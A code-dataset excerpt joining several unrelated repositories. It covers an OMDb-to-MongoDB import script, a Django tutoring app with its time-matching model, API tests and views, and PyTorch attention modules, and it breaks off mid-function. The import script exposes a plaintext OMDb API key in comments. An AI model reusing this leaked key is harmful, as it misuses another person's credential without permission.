docs = [c.find_one({'imdbID': docIDs[i]}) for i in range(nums)]
return [d for d in docs if d is not None]
def output(self)->List:
"""
return the original docs
"""
docs = []
# 1. 检查输入是否合理
if self.precheck() is False:
return docs
# 2. 排序
docIDs = self.ranking()
# 获得对应文档
docs = self.getDocs(docIDs)
return docs
```
#### File: backend/storeData/ImdbToMongodb.py
```python
import requests
import pymongo
import pandas as pd
# key: fe53f97e
class ImdbToMongoDB:
def __init__(self, key):
self.url = "http://www.omdbapi.com/?apikey=" + key + "&i="
self.client = pymongo.MongoClient("mongodb+srv://jack:<EMAIL>")
def readMovieFile(self, num):
df = pd.read_csv("movieFragments/movieData" + str(num) + ".csv")
return df['tconst'].values.tolist()
def imdbAPI(self, id):
return requests.get(self.url + id + "&plot=full").json()
def sendToMongoDB(self):
db = self.client['IMDBData']
collection = db['Movies']
movie = self.imdbAPI("tt1431045")
collection.insert_one(movie)
# for i in range(35000, 207581, 5000):
# print("------------------------------------")
# print("I am sending the movieData" + str(i) + ".csv file")
# movieIDList = self.readMovieFile(i)
# count = 0
# movies = []
# for id in movieIDList:
# try:
# movie = self.imdbAPI(id)
# movies.append(movie)
# if count % 1000 == 0:
# print(count)
# count = count + 1
# except:
# print("This id:" + id + " results problem.")
#
# collection.insert_many(movies)
# test = ImdbToMongoDB("fe53f97e")
# test.sendToMongoDB()
``` |
{
"source": "2019-swpp-8/swpp",
"score": 2
} |
#### File: swpp/migrations/0011_load_initial_data.py
```python
from django.db import migrations
from django.core.management import call_command
fixture = 'initial_data'
def load_fixture(apps, schema_editor):
unload_fixture(apps, schema_editor)
call_command('loaddata', fixture, app_label='swpp')
def unload_fixture(apps, schema_editor):
lecture = apps.get_model('swpp', 'lecture')
lecture.objects.all().delete()
class Migration(migrations.Migration):
dependencies = [
('swpp', '0010_profile_name'),
]
operations = [
migrations.RunPython(load_fixture, reverse_code = unload_fixture)
]
```
#### File: swpp/model/times.py
```python
from django.db import models
from annoying.fields import AutoOneToOneField
class Times(models.Model):
mon = models.BigIntegerField(default = 0)
tue = models.BigIntegerField(default = 0)
wed = models.BigIntegerField(default = 0)
thu = models.BigIntegerField(default = 0)
fri = models.BigIntegerField(default = 0)
sat = models.BigIntegerField(default = 0)
sun = models.BigIntegerField(default = 0)
# other is Times
def flip(self, other):
self.mon ^= other.mon
self.tue ^= other.tue
self.wed ^= other.wed
self.thu ^= other.thu
self.fri ^= other.fri
self.sat ^= other.sat
self.sun ^= other.sun
# other is TimesSerializer
# minInterval, total: 1 per 30 min. ex) 4 = 2 hrs
def isAvailable(self, other, minInterval, total):
mon = self.mon & other.data['mon']
tue = self.tue & other.data['tue']
wed = self.wed & other.data['wed']
thu = self.thu & other.data['thu']
fri = self.fri & other.data['fri']
sat = self.sat & other.data['sat']
sun = self.sun & other.data['sun']
available = 0
for time in (mon, tue, wed, thu, fri, sat, sun):
combo = 0
while time:
if time & 1: combo += 1
else:
if combo >= minInterval: available += combo
combo = 0
time >>= 1
if combo >= minInterval: available += combo
return available >= total
```
#### File: backend/swpp/tests.py
```python
from django.test import TestCase
from django.contrib.auth import get_user_model
from rest_framework.test import APITestCase, APITransactionTestCase
from swpp.apps import SwppConfig
from datetime import datetime, timezone, timedelta
from rest_framework import serializers, status
from swpp.serializers import *
from django.core import mail
from django.utils.encoding import smart_text
import re
class LowLevelTests(APITestCase):
def create_user(self, username, password):
return self.User.objects.create_user(username, password)
def setUp(self):
self.User = get_user_model()
def test_sanity(self):
self.assertTrue(True)
def test_app_name(self):
self.assertEqual(SwppConfig.name, 'swpp')
def test_user_profile_relation(self):
user = self.create_user('t', '1')
self.assertTrue(hasattr(user, 'profile'))
self.assertTrue(hasattr(user.profile, 'user'))
self.assertEqual(user, user.profile.user)
def test_profile_joined_time(self):
from_time = datetime.now(timezone.utc) - timedelta(seconds = 1)
user = self.create_user('t', '1')
to_time = datetime.now(timezone.utc) + timedelta(seconds = 1)
self.assertTrue(user.profile.joined >= from_time)
self.assertTrue(user.profile.joined <= to_time)
def test_user_profile_tutor_relation(self):
user = self.create_user('t', '1')
self.assertTrue(hasattr(user, 'profile'))
self.assertTrue(hasattr(user.profile, 'user'))
self.assertEqual(user, user.profile.user)
self.assertTrue(hasattr(user.profile, 'tutor'))
self.assertTrue(hasattr(user.profile.tutor, 'profile'))
self.assertEqual(user.profile, user.profile.tutor.profile)
# added 05/01, from modelInit branch
def test_valid_profile(self):
user = self.create_user('s', '2')
data = {'major': '', 'contact': '010-1111-1111', 'name': 'test'}
serializer = ProfileSerializer(user.profile, data = data, partial = True)
self.assertFalse(serializer.is_valid())
data['major'] = 'bio'
serializer = ProfileSerializer(user.profile, data = data, partial = True)
self.assertTrue(serializer.is_valid())
serializer.save()
data['contact'] = '010-11111-1111'
serializer = ProfileSerializer(user.profile, data = data, partial = True)
self.assertFalse(serializer.is_valid())
def test_valid_times(self):
user = self.create_user('q', '3')
self.assertEqual(user.profile.tutor.times.mon, 0)
data = {'mon': 1 << 48, 'tue': (1 << 48) - 1, 'wed': 1 << 47,
'thu': 1, 'fri': 0, 'sat': -1, 'sun': -(1 << 48) + 1}
serializer = TimesSerializer(data = data)
self.assertFalse(serializer.is_valid())
data['mon'] = 1
serializer = TimesSerializer(data = data)
self.assertFalse(serializer.is_valid())
data['sat'] = 3
serializer = TimesSerializer(data = data)
self.assertFalse(serializer.is_valid())
data['sun'] = 72698241236
serializer = TimesSerializer(data = data)
self.assertTrue(serializer.is_valid())
serializer.save()
self.assertEqual(serializer.data['sat'], 3)
def test_prof_put(self):
user = self.create_user('profPutTestID', 'profPutTestPW')
url = '/profile/{0}/'.format(user.id)
data = {'major': 'cse', 'contact': '010-1234-5678'}
response = self.client.put(url, data)
self.assertTrue(response.status_code >= 400)
self.client.force_login(user)
self.client.get("/users/")
before = self.client.get(url).data
# self.client.force_authenticate(user=user)
self.client.put(url, data)
after = self.client.get(url).data
self.assertEqual(before["major"], "")
self.assertEqual(before["contact"], "010-0000-0000")
self.assertEqual(after["major"], "cse")
self.assertEqual(after["contact"], "010-1234-5678")
response = self.client.put(url, {'contact':'0'})
self.assertTrue(response.status_code >= 400)
def test_prof_contact_permission(self):
user1 = self.create_user('user1', 'user1')
user2 = self.create_user('user2', 'user2')
url = '/profiles/'
url1 = '/profile/{0}/'.format(user1.id)
url2 = '/profile/{0}/'.format(user2.id)
self.client.get('/users/')
self.client.force_login(user1)
prof_list1 = self.client.get(url).data
prof1 = self.client.get(url1).data
prof2 = self.client.get(url2).data
self.assertEqual(prof1['contact'], "010-0000-0000")
self.assertEqual(prof2['contact'], "")
self.assertEqual(prof_list1[0]['contact'], "010-0000-0000")
self.assertEqual(prof_list1[1]['contact'], "")
# added 05/05, from tutor_put_request branch
def test_tutor_put(self):
user = self.create_user('iidd', 'ppww')
#login = self.client.login(username = 'iidd', password = '<PASSWORD>')
#self.assertTrue(login)
tutorid = "/tutor/{0}/".format(user.id)
data = {'bio': 'hi', 'exp': 'A'}
response = self.client.put(tutorid, data)
self.assertTrue(status.is_client_error(response.status_code))
self.client.force_login(user)
users = self.client.get("/users/").data
profiles = self.client.get("/profiles/").data
prev = self.client.get(tutorid).data
self.client.put(tutorid, data)
curr = self.client.get(tutorid).data
self.assertEqual(prev['bio'], "")
self.assertEqual(curr['bio'], "hi")
self.assertEqual(prev['exp'], "")
self.assertEqual(curr['exp'], "A")
# added 05/17, from tutor_search_filter branch
# added 05/30, from search_tutor_with_lecture branch
def test_tutor_filter(self):
user = self.create_user('iidd', 'ppww')
data = {'bio': 'my bio', 'exp': 'MY EXP'}
prof = {'major': 'my major'}
other_user = self.create_user('idother', 'pwother')
other_data = {'bio': 'YOUR BIO', 'exp': 'your exp'}
other_prof = {'major': 'your major'}
korean_user = self.create_user('idkorean', 'pwkorean')
korean_data = {'bio': '자기소개', 'exp': '경력'}
korean_prof = {'major': '전공'}
users = self.client.get("/users/").data
profiles = self.client.get("/profiles/").data
self.client.force_login(user)
self.client.put("/tutor/{0}/".format(user.id), data)
self.client.put("/profile/{0}/".format(user.id), prof)
self.client.force_login(other_user)
self.client.put("/tutor/{0}/".format(other_user.id), other_data)
self.client.put("/profile/{0}/".format(other_user.id), other_prof)
self.client.force_login(korean_user)
self.client.put("/tutor/{0}/".format(korean_user.id), korean_data)
self.client.put("/profile/{0}/".format(korean_user.id), korean_prof)
tutors = self.client.get("/tutors/").data
self.assertEqual(len(tutors), 3)
tutors = self.client.get("/tutors/?bio=bi&exp=ex").data
self.assertEqual(len(tutors), 2)
tutors = self.client.get("/tutors/", {'bio': '소개', 'exp': '경'}).data
self.assertEqual(len(tutors), 1)
self.assertEqual(tutors[0]['profile']['user'], korean_user.id)
tutors = self.client.get("/tutors/", {'bio': 'ur b'}).data
self.assertEqual(len(tutors), 1)
self.assertEqual(tutors[0]['profile']['user'], other_user.id)
tutors = self.client.get("/tutors/?major=major").data
self.assertEqual(len(tutors), 2)
tutors = self.client.get("/tutors/", {'major': '전'}).data
self.assertEqual(len(tutors), 1)
self.assertEqual(tutors[0]['profile']['user'], korean_user.id)
# check for times
times1 = {'mon': 0x3DC0, #0b0011110111000000
'tue': 0xD4F0, #0b1101010011110000
'wed': 0x0,
'thu': 0x0,
'fri': 0x0,
'sat': 0x0,
'sun': 0x0} # total 7.5hr
times2 = {'mon': 0x0,
'tue': 0x99D0, #0b1001100111010000
'wed': 0xFC7C, #0b1111110001111100
'thu': 0x0,
'fri': 0x0,
'sat': 0x0,
'sun': 0x0} # total 9hr
times3 = {'mon': 0xFFFF, #0b1111111111111111
'tue': 0xFFFF, #0b1111111111111111
'wed': 0xFFFF, #0b1111111111111111
'thu': 0xFFFF, #0b1111111111111111
'fri': 0x0,
'sat': 0x0,
'sun': 0x0,
'total': 15}
self.client.force_login(user)
self.client.put("/times/{0}/".format(user.profile.tutor.times.id), times1)
self.client.force_login(other_user)
self.client.put("/times/{0}/".format(other_user.profile.tutor.times.id), times2)
tutors = self.client.get("/tutors/", times3).data
self.assertEqual(len(tutors), 2)
times3['total'] = 18
tutors = self.client.get("/tutors/", times3).data
self.assertEqual(len(tutors), 1)
self.assertEqual(tutors[0]['profile']['user'], other_user.id)
times3['total'] = 12
times3['minInterval'] = 3
tutors = self.client.get("/tutors/", times3).data
self.assertEqual(len(tutors), 1)
self.assertEqual(tutors[0]['profile']['user'], other_user.id)
times3['total'] = 15
tutors = self.client.get("/tutors/", times3).data
self.assertEqual(len(tutors), 0)
times3['wed'] = 0
times3['total'] = 6
times3['minInterval'] = 2
tutors = self.client.get("/tutors/", times3).data
self.assertEqual(len(tutors), 1)
self.assertEqual(tutors[0]['profile']['user'], user.id)
times3['mon'] = 0xF3E0 #0b1111001111100000
times3['total'] = 7
times3['minInterval'] = 3
tutors = self.client.get("/tutors/", times3).data
self.assertEqual(len(tutors), 1)
self.assertEqual(tutors[0]['profile']['user'], user.id)
times3['total'] = 8
tutors = self.client.get("/tutors/", times3).data
self.assertEqual(len(tutors), 0)
# check for lectures
self.client.force_login(user)
self.client.put("/tutor/{0}/".format(user.id), {'lectures': [2, 4, 6]})
self.client.force_login(other_user)
self.client.put("/tutor/{0}/".format(other_user.id), {'lectures': [1, 2, 3, 4]})
self.client.force_login(korean_user)
self.client.put("/tutor/{0}/".format(korean_user.id), {'lectures': [4, 5]})
tutors = self.client.get("/tutors/?lecture=4").data
self.assertEqual(len(tutors), 3)
tutors = self.client.get("/tutors/?lecture=2").data
self.assertEqual(len(tutors), 2)
tutors = self.client.get("/tutors/?lecture=1").data
self.assertEqual(len(tutors), 1)
tutors = self.client.get("/tutors/?lecture=7").data
self.assertEqual(len(tutors), 0)
tutors = self.client.get("/tutors/?lecTitle=글쓰기").data
self.assertEqual(len(tutors), 3)
tutors = self.client.get("/tutors/?lecProf=허윤").data
self.assertEqual(len(tutors), 2)
def test_tutor_list_ordering(self):
user = self.create_user('iidd', 'ppww')
data = {'bio': 'my bio', 'exp': 'MY EXP'}
prof = {'major': 'my major', 'name':'나나나'}
other_user = self.create_user('idother', 'pwother')
other_data = {'bio': 'YOUR BIO', 'exp': 'your exp'}
other_prof = {'major': 'your major', 'name':'다다다'}
korean_user = self.create_user('idkorean', 'pwkorean')
korean_data = {'bio': '자기소개', 'exp': '경력'}
korean_prof = {'major': '전공', 'name':'가가가'}
users = self.client.get("/users/").data
profiles = self.client.get("/profiles/").data
self.client.force_login(user)
self.client.put("/tutor/{0}/".format(user.id), data)
self.client.put("/profile/{0}/".format(user.id), prof)
self.client.force_login(other_user)
self.client.put("/tutor/{0}/".format(other_user.id), other_data)
self.client.put("/profile/{0}/".format(other_user.id), other_prof)
self.client.force_login(korean_user)
self.client.put("/tutor/{0}/".format(korean_user.id), korean_data)
self.client.put("/profile/{0}/".format(korean_user.id), korean_prof)
tutors = self.client.get("/tutors/").data
self.assertEqual(tutors[0]['profile']['name'], "가가가")
self.assertEqual(tutors[1]['profile']['name'], "나나나")
self.assertEqual(tutors[2]['profile']['name'], "다다다")
def test_lectures_database(self):
lectures = self.client.get("/lectures/").data
self.assertEqual(len(lectures), 30214)
lecture = {'title': '궰쇆뮶'}
lectures = self.client.get("/lectures/", lecture).data
self.assertEqual(len(lectures), 0)
lecture = {'prof': '문병로'}
lectures = self.client.get("/lectures/", lecture).data
self.assertEqual(len(lectures), 5)
lecture['title'] = '알고'
lectures = self.client.get("/lectures/", lecture).data
self.assertEqual(len(lectures), 3)
del lecture['prof']
lecture['title'] = '대학 글쓰기 1'
lectures = self.client.get("/lectures/", lecture).data
self.assertEqual(len(lectures), 35)
lecture['prof'] = '나민애'
lectures = self.client.get("/lectures/", lecture).data
self.assertEqual(len(lectures), 1)
lecture['prof'] = '문병로'
lectures = self.client.get("/lectures/", lecture).data
self.assertEqual(len(lectures), 0)
def test_request(self):
user1 = self.create_user('id1', 'pw2')
user2 = self.create_user('id3', 'pw4')
self.client.get("/users/").data
self.client.get("/profiles/").data
self.client.get("/tutors/").data
self.client.force_login(user2)
request = {'tutor': user1.id, 'tutee': user2.id, 'lecture': 1, 'detail': "a", 'payment': "b",
'mon': 1, 'tue': 2, 'wed': 1, 'thu': 2, 'fri': 1, 'sat': 2, 'sun': 0}
self.assertTrue(self.client.post("/requests/", request).status_code >= 400)
times = {'mon': 7,
'tue': 7,
'wed': 7,
'thu': 7,
'fri': 7,
'sat': 7,
'sun': 7}
times_id = user1.profile.tutor.times.id
tutoringTimes_id = user1.profile.tutor.tutoringTimes.id
self.client.put("/times/{0}/".format(times_id), times)
self.client.post("/requests/", request)
request = {'tutor': user1.id, 'tutee': user2.id, 'lecture': 1, 'detail': "a", 'payment': "b",
'mon': 4, 'tue': 0, 'wed': 2, 'thu': 1, 'fri': 0, 'sat': 0, 'sun': 7}
self.client.post("/requests/", request)
self.client.delete("/request/2/")
self.client.post("/requests/", request)
self.client.force_login(user1)
self.client.delete("/request/3/")
self.client.force_login(user2)
requests = self.client.get("/requests/").data
self.assertEqual(len(requests), 1)
request['sun'] = 8
self.assertTrue(self.client.post("/requests/", request).status_code >= 400)
request['sun'] = 0
request['tutee'] = 1
self.assertTrue(self.client.post("/requests/", request).status_code >= 400)
self.assertEqual(requests[0]['times']['mon'], 1)
self.assertEqual(requests[0]['times']['sat'], 2)
request = self.client.get("/request/1/").data
self.assertEqual(request['status'], 0)
prof = self.client.get('/profile/{0}/'.format(user1.id)).data
self.assertEqual(prof['contact'], "")
self.client.force_login(user1)
request = self.client.put("/request/1/", {'status': 1}).data
self.assertEqual(request['status'], 1)
request = self.client.get('/times/{0}/'.format(times_id)).data
self.assertEqual(request['mon'], 6)
self.assertEqual(request['sun'], 7)
request = self.client.get('/times/{0}/'.format(tutoringTimes_id)).data
self.assertEqual(request['sat'], 2)
self.assertEqual(request['sun'], 0)
times['mon'] = 15
times['tutor'] = user1.id
self.assertTrue(self.client.put('/times/{0}/'.format(times_id), times).status_code >= 400)
prof = self.client.get('/profile/{0}/'.format(user1.id)).data
self.assertEqual(prof['contact'], "010-0000-0000")
self.client.force_login(user1)
prof = self.client.get('/profile/{0}/'.format(user2.id)).data
self.assertEqual(prof['contact'], "010-0000-0000")
self.assertEqual(len(prof['notifications']), 2)
self.assertFalse(prof['notifications'][0]['read'])
notification = self.client.get('/notification/{0}/'.format(prof['notifications'][0]['id'])).data
self.assertTrue(notification['read'])
self.assertTrue(self.client.get('/notification/9999/').status_code == 404)
request = self.client.put("/request/1/", {'status': 2}).data
self.assertEqual(request['status'], 2)
request = self.client.get('/times/{0}/'.format(times_id)).data
self.assertEqual(request['tue'], 7)
request = self.client.get('/times/{0}/'.format(tutoringTimes_id)).data
self.assertEqual(request['wed'], 0)
self.assertEqual(request['sun'], 0)
self.client.put('/times/{0}/'.format(times_id), times)
request = self.client.get('/times/{0}/'.format(times_id)).data
self.assertEqual(request['mon'], 15)
prof = self.client.get('/profile/{0}/'.format(user2.id)).data
self.assertEqual(prof['contact'], "")
class HighLevelTests(APITransactionTestCase):
def setUp(self):
self.User = get_user_model()
self.verify_url_matcher = re.compile(r'(\/auth\/activate\/[0-9a-f]+\/)')
def register(self, username, email, passwd):
return self.client.post('/auth/register/', {
'username': username,
'email': email,
'password1': <PASSWORD>,
'password2': <PASSWORD>
})
def verify_email(self, email):
resp = None
for msg in mail.outbox:
if len(msg.to) == 1 and msg.to[0] == email:
url = self.verify_url_matcher.search(msg.body)
self.assertIsNot(url, None)
resp = self.client.get(url.group())
return resp
# Naming scheme: foo_s: expect success, foo_f: expect failure
def register_s(self, username, email, passwd):
resp = self.register(username, email, passwd)
self.assertEqual(resp.status_code, 302)
self.assertEqual(resp.url, '/auth/register/complete/')
ver = self.verify_email(email)
self.assertIsNot(ver, None)
self.assertEqual(ver.status_code, 302)
self.assertEqual(ver.url, '/auth/activate/complete/')
def register_f(self, username, email, passwd):
failed = False
resp = self.register(username, email, passwd)
if resp.status_code != 302:
failed = True
ver = self.verify_email(email)
if ver is None or ver.status_code != 302:
failed = True
# 여기까지 왔다면 망한거!
self.assertTrue(failed)
def test_registration(self):
# 이메일이 snu가 아님
self.register_f('testuser0', '<EMAIL>', '9328h9ih!sdf')
# OK
self.register_s('testuser0', '<EMAIL>', 'A!98uk_48ohD')
# 이메일 중복
self.register_f('dup_email', '<EMAIL>', 'v09#oijsad#S')
# 유저네임 중복
self.register_f('testuser0', '<EMAIL>', '0iDSAF2^49oj')
# OK
self.register_s('testuser1', '<EMAIL>', '(oir!eLI+Esd')
# 패스워드 약함
self.register_f('testuser2', '<EMAIL>', 'password')
def test_user_current(self):
un = 'test'
pw = <PASSWORD>'
me = self.client.get('/user/current/')
self.assertTrue(status.is_client_error(me.status_code))
self.register_s('test', '<EMAIL>', pw)
self.client.login(username=un, password=pw)
me = self.client.get('/user/current/')
self.assertTrue(status.is_success(me.status_code))
self.assertEqual(me.data['username'], un)
```
#### File: swpp/view/times.py
```python
from django.shortcuts import render
from swpp.models import Times, Tutor
from swpp.serializers import TimesSerializer
from rest_framework import generics, mixins
from rest_framework.response import Response
class TimesList(generics.ListAPIView):
queryset = Times.objects.all()
serializer_class = TimesSerializer
class TimesDetails(generics.RetrieveUpdateDestroyAPIView):
queryset = Times.objects.all()
serializer_class = TimesSerializer
def put(self, request, *args, **kwargs):
times = Times.objects.get(pk = kwargs['pk'])
context = {}
if 'tutor' in request.POST:
context['tutoringTimes'] = Tutor.objects.get(pk = request.data.get('tutor')).tutoringTimes
serializer = TimesSerializer(times, data=request.data, context=context)
if serializer.is_valid():
serializer.save()
return Response(serializer.data)
return Response(serializer.errors, status=400)
# return self.update(request, *args, **kwargs)
``` |
{
"source": "2019ZSS/FER",
"score": 3
} |
#### File: FER/models/at.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
class NonLocalBlock(nn.Module):
def __init__(self, in_channels: int):
super(NonLocalBlock, self).__init__()
self.inter_channel = in_channels // 2
self.conv_phi = nn.Conv2d(in_channels=in_channels, out_channels=self.inter_channel,
kernel_size=1, stride=1, padding=0, bias=False)
self.conv_theta = nn.Conv2d(in_channels=in_channels, out_channels=self.inter_channel,
kernel_size=1, stride=1, padding=0, bias=False)
self.conv_g = nn.Conv2d(in_channels=in_channels, out_channels=self.inter_channel,
kernel_size=1, stride=1, padding=0, bias=False)
self.conv_mask = nn.Conv2d(in_channels=self.inter_channel, out_channels=in_channels,
kernel_size=1, stride=1, padding=0, bias=False)
def forward(self, x):
# [B, C, H, W]
b, c, h, w = x.size()
# [B, C / 2, H * W]
x_phi = self.conv_phi(x).view(b, c, -1)
# [B, H * W, C/2]
x_theta = self.conv_theta(x).view(b, c, -1).permute(0, 2, 1).contiguous()
x_g = self.conv_g(x).view(b, c, -1).permute(0, 2, 1).contiguous()
# [B, H * W, H * W]
mul_theta_phi = F.softmax(torch.matmul(x_theta, x_phi), dim=1)
# [B, H*W, C / 2]
mul_theta_phi_g = torch.matmul(mul_theta_phi, x_g)
# [B, C / 2, H, w]
mul_theta_phi_g = mul_theta_phi_g.permute(0,2,1).contiguous().view(b, self.inter_channel, h, w)
# [B, C, H , W]
mask = self.conv_mask(mul_theta_phi_g)
out = mask + x
return out
class ContextBlock(nn.Module):
'''
Global Context Network(GCNet)
Paper: Global Context Network(GCNet)
Code: https://github.com/xvjiarui/GCNet
Analysis: https://blog.csdn.net/sinat_17456165/article/details/106760606
'''
def __init__(self, inplanes, ratio=1.0/16, pooling_type='att', fusion_types=('channel_add', )):
super(ContextBlock, self).__init__()
valid_fusion_types = ['channel_add', 'channel_mul']
assert pooling_type in ['avg', 'att']
assert isinstance(fusion_types, (list, tuple))
assert all([f in valid_fusion_types for f in fusion_types])
assert len(fusion_types) > 0, 'at least one fusion should be used'
self.inplanes = inplanes
self.ratio = ratio
self.planes = int(inplanes * ratio)
self.pooling_type = pooling_type
self.fusion_types = fusion_types
if pooling_type == 'att':
self.conv_mask = nn.Conv2d(inplanes, 1, kernel_size=1)
self.softmax = nn.Softmax(dim=2)
else:
self.avg_pool = nn.AdaptiveAvgPool2d(1)
if 'channel_add' in fusion_types:
self.channel_add_conv = nn.Sequential(
nn.Conv2d(self.inplanes, self.planes, kernel_size=1),
nn.LayerNorm([self.planes, 1, 1]),
nn.ReLU(inplace=True), # yapf: disable
nn.Conv2d(self.planes, self.inplanes, kernel_size=1))
else:
self.channel_add_conv = None
if 'channel_mul' in fusion_types:
self.channel_mul_conv = nn.Sequential(
nn.Conv2d(self.inplanes, self.planes, kernel_size=1),
nn.LayerNorm([self.planes, 1, 1]),
nn.ReLU(inplace=True), # yapf: disable
nn.Conv2d(self.planes, self.inplanes, kernel_size=1))
else:
self.channel_mul_conv = None
def spatial_pool(self, x):
batch, channel, height, width = x.size()
if self.pooling_type == 'att':
input_x = x
# [N, C, H * W]
input_x = input_x.view(batch, channel, height * width)
# [N, 1, C, H * W]
input_x = input_x.unsqueeze(1)
# [N, 1, H, W]
context_mask = self.conv_mask(x)
# [N, 1, H * W]
context_mask = context_mask.view(batch, 1, height * width)
# [N, 1, H * W]
context_mask = self.softmax(context_mask)
# [N, 1, H * W, 1]
context_mask = context_mask.unsqueeze(-1)
# [N, 1, C, 1]
context = torch.matmul(input_x, context_mask)
# [N, C, 1, 1]
context = context.view(batch, channel, 1, 1)
else:
# [N, C, 1, 1]
context = self.avg_pool(x)
return context
def forward(self, x):
# [N, C, 1, 1]
context = self.spatial_pool(x)
out = x
if self.channel_mul_conv is not None:
# [N, C, 1, 1]
channel_mul_term = torch.sigmoid(self.channel_mul_conv(context))
out = out * channel_mul_term
if self.channel_add_conv is not None:
# [N, C, 1, 1]
channel_add_term = self.channel_add_conv(context)
out = out + channel_add_term
return out
class PyramidPooling(nn.Module):
"""
Reference:
Zhao, Hengshuang, et al. *"Pyramid scene parsing network."*
"""
def __init__(self, in_channels, norm_layer, up_kwargs):
super(PyramidPooling, self).__init__()
self.pool1 = nn.AdaptiveAvgPool2d(1)
self.pool2 = nn.AdaptiveAvgPool2d(2)
self.pool3 = nn.AdaptiveAvgPool2d(3)
self.pool4 = nn.AdaptiveAvgPool2d(6)
out_channels = int(in_channels/4)
self.conv1 = nn.Sequential(nn.Conv2d(in_channels, out_channels, 1, bias=False),
norm_layer(out_channels),
nn.ReLU(True))
self.conv2 = nn.Sequential(nn.Conv2d(in_channels, out_channels, 1, bias=False),
norm_layer(out_channels),
nn.ReLU(True))
self.conv3 = nn.Sequential(nn.Conv2d(in_channels, out_channels, 1, bias=False),
norm_layer(out_channels),
nn.ReLU(True))
self.conv4 = nn.Sequential(nn.Conv2d(in_channels, out_channels, 1, bias=False),
norm_layer(out_channels),
nn.ReLU(True))
# bilinear interpolate options
self._up_kwargs = up_kwargs
def forward(self, x):
_, _, h, w = x.size()
feat1 = F.interpolate(self.conv1(self.pool1(x)), (h, w), **self._up_kwargs)
feat2 = F.interpolate(self.conv2(self.pool2(x)), (h, w), **self._up_kwargs)
feat3 = F.interpolate(self.conv3(self.pool3(x)), (h, w), **self._up_kwargs)
feat4 = F.interpolate(self.conv4(self.pool4(x)), (h, w), **self._up_kwargs)
return torch.cat((x, feat1, feat2, feat3, feat4), 1)
class StripPooling(nn.Module):
"""
Reference:
"""
def __init__(self, in_channels, pool_size, up_kwargs, norm_layer=nn.BatchNorm2d):
super(StripPooling, self).__init__()
self.pool1 = nn.AdaptiveAvgPool2d(pool_size[0])
self.pool2 = nn.AdaptiveAvgPool2d(pool_size[1])
self.pool3 = nn.AdaptiveAvgPool2d((1, None))
self.pool4 = nn.AdaptiveAvgPool2d((None, 1))
inter_channels = int(in_channels/4)
self.conv1_1 = nn.Sequential(nn.Conv2d(in_channels, inter_channels, 1, bias=False),
norm_layer(inter_channels),
nn.ReLU(True))
self.conv1_2 = nn.Sequential(nn.Conv2d(in_channels, inter_channels, 1, bias=False),
norm_layer(inter_channels),
nn.ReLU(True))
self.conv2_0 = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, 3, 1, 1, bias=False),
norm_layer(inter_channels))
self.conv2_1 = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, 3, 1, 1, bias=False),
norm_layer(inter_channels))
self.conv2_2 = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, 3, 1, 1, bias=False),
norm_layer(inter_channels))
self.conv2_3 = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, (1, 3), 1, (0, 1), bias=False),
norm_layer(inter_channels))
self.conv2_4 = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, (3, 1), 1, (1, 0), bias=False),
norm_layer(inter_channels))
self.conv2_5 = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, 3, 1, 1, bias=False),
norm_layer(inter_channels),
nn.ReLU(True))
self.conv2_6 = nn.Sequential(nn.Conv2d(inter_channels, inter_channels, 3, 1, 1, bias=False),
norm_layer(inter_channels),
nn.ReLU(True))
self.conv3 = nn.Sequential(nn.Conv2d(inter_channels*2, in_channels, 1, bias=False),
norm_layer(in_channels))
# bilinear interpolate options
self._up_kwargs = up_kwargs
def forward(self, x):
_, _, h, w = x.size()
x1 = self.conv1_1(x)
x2 = self.conv1_2(x)
x2_1 = self.conv2_0(x1)
x2_2 = F.interpolate(self.conv2_1(self.pool1(x1)), (h, w), **self._up_kwargs)
x2_3 = F.interpolate(self.conv2_2(self.pool2(x1)), (h, w), **self._up_kwargs)
x2_4 = F.interpolate(self.conv2_3(self.pool3(x2)), (h, w), **self._up_kwargs)
x2_5 = F.interpolate(self.conv2_4(self.pool4(x2)), (h, w), **self._up_kwargs)
x1 = self.conv2_5(F.relu_(x2_1 + x2_2 + x2_3))
x2 = self.conv2_6(F.relu_(x2_5 + x2_4))
out = self.conv3(torch.cat([x1, x2], dim=1))
return F.relu_(x + out)
class BilinearCNN(nn.Module):
def __init__(self, in_channels=512, inter_channels=512, num_classes=7, drop=0., eps=1e-10):
super(BilinearCNN, self).__init__()
self._in_channels = in_channels
self._inter_channels = inter_channels
self._eps = eps
if self._in_channels != self._inter_channels:
self.conv = nn.Sequential(nn.Conv2d(in_channels=self._in_channels, out_channels=self._inter_channels, kernel_size=1),
nn.BatchNorm2d(in_channels),
nn.ReLU(True))
self.fc = nn.Linear(in_features=inter_channels**2, out_features=num_classes)
self.drop = nn.Dropout(drop) if drop > 0 else nn.Identity()
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode="fan_out", nonlinearity="relu")
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
def forward(self, x):
batch_size, in_channels, h, w = x.size()
feature_size = h * w
if self._in_channels != self._inter_channels:
x = self.conv(x)
x = x.view(batch_size, self._inter_channels, feature_size)
x = (torch.bmm(x, torch.transpose(x, 1, 2)) / feature_size).view(batch_size, -1)
x = torch.nn.functional.normalize(torch.sign(x) * torch.sqrt(torch.abs(x) + self._eps))
return self.fc(self.drop(x))
class SEWeightModule(nn.Module):
def __init__(self, channels, reduction=16):
super(SEWeightModule, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d(1)
self.fc1 = nn.Conv2d(channels, channels//reduction, kernel_size=1, padding=0)
self.relu = nn.ReLU(inplace=True)
self.fc2 = nn.Conv2d(channels//reduction, channels, kernel_size=1, padding=0)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
out = self.avg_pool(x)
out = self.fc1(out)
out = self.relu(out)
out = self.fc2(out)
weight = self.sigmoid(out)
return weight
def conv(in_planes, out_planes, kernel_size=3, stride=1, padding=1, dilation=1, groups=1):
"""standard convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=kernel_size, stride=stride,
padding=padding, dilation=dilation, groups=groups, bias=False)
def conv1x1(in_planes, out_planes, stride=1):
"""1x1 convolution"""
